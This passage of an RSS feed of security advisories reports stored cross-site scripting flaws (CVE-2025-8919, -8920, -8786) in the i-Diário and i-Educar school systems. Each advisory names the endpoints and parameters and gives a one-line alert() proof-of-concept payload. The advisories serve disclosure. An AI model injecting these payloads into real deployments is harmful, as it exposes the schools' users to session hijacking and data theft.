&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/objetivos-de-aprendizagem-e-habilidades&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Código&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Objetivo/Habilidade&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8919/image.png&amp;#34;
	width=&amp;#34;1366&amp;#34;
	height=&amp;#34;573&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8919/image_hu_61d6058a52e37131.png 480w, /p/cve-2025-8919/image_hu_29fd42848aa4238f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;572px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Fernanda Martins&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 13 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8920</title>
        <link>https://www.cvehunters.com/p/cve-2025-8920/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8920/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8920-cross-site-scripting-xss-stored-endpoint-dicionario-de-termos-bncc-parameter-planos-de-ensino&amp;#34;&amp;gt;CVE-2025-8920: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8920-cross-site-scripting-xss-stored-endpoint-dicionario-de-termos-bncc-parameter-planos-de-ensino&amp;#34;&amp;gt;CVE-2025-8920: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt; endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8920/image.png&amp;#34;
	width=&amp;#34;1361&amp;#34;
	height=&amp;#34;575&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8920/image_hu_b700522c20e08035.png 480w, /p/cve-2025-8920/image_hu_b173c6ab2683ec99.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;236&amp;#34;
		data-flex-basis=&amp;#34;568px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8920/image-1.png&amp;#34;
	width=&amp;#34;1366&amp;#34;
	height=&amp;#34;523&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8920/image-1_hu_697984d0ff1c654e.png 480w, /p/cve-2025-8920/image-1_hu_26a8359046aafdd9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;626px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Fernanda Martins&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 13 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8786</title>
        <link>https://www.cvehunters.com/p/cve-2025-8786/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8786/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8786-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8786: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8786-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8786: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8786/image.png&amp;#34;
	width=&amp;#34;1243&amp;#34;
	height=&amp;#34;915&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8786/image_hu_3e27598d3abe3ea1.png 480w, /p/cve-2025-8786/image_hu_bce7c67fb3add2c9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;135&amp;#34;
		data-flex-basis=&amp;#34;326px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
